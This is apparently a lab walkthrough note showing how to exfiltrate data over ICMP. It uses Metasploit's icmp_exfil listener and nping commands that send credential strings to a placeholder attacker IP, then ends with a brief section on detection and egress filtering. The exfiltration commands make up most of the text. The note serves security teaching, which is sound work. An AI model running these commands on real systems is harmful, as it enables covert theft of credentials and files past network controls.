Data exfiltration over ICMP¶

Using Metasploit auxiliary/server/icmp_exfil:

# msfconsole
msf6 > use auxiliary/server/icmp_exfil
msf6 auxiliary(server/icmp_exfil) > options

Module options (auxiliary/server/icmp_exfil):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   BPF_FILTER       icmp             yes       BFP format filter to listen for
   END_TRIGGER      ^EOF             yes       Trigger for end of file
   FNAME_IN_PACKET  true             yes       Filename presented in first pac
                                               ket straight after START_TRIGGE
                                               R
   INTERFACE                         no        The name of the interface
   RESP_CONT        OK               yes       Data ro resond when continuatio
                                               n of data expected
   RESP_END         COMPLETE         yes       Data to response when EOF recei
                                               ved and data saved
   RESP_START       SEND             yes       Data to respond when initial tr
                                               igger matches
   START_TRIGGER    ^BOF             yes       Trigger for beginning of file

Set options:

msf6 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src <IP attack machine>
BPF_FILTER => icmp and not src <IP attack machine>
msf6 auxiliary(server/icmp_exfil) > set INTERFACE tun0

In another terminal, go into the icmp box and start the transmission:

thm@jump-box$ ssh thm@icmp.thm.com
thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "BOFfile.txt"

Send the data:

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "admin:password"

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "admin2:password2"

End the transmission:

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "EOF"

Results:

msf6 auxiliary(server/icmp_exfil) > run
    
[*] ICMP Listener started on eth0 (ATTACKBOX_IP). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
[+] Beginning capture of "file.txt" data
[*] 30 bytes of data received in total
[+] End of File received. Saving "file.txt" to loot
[+] Incoming file "file.txt" saved to loot
[+] Loot filename: /path/to/loot/filename.txt

Counter moves¶

Echo requests with unusual payload length or volume are the tell, since most networks have no reason for large or frequent ICMP. Egress filtering of ICMP and simple size baselining close it. The defender’s view is in the blue notes on watching the exits.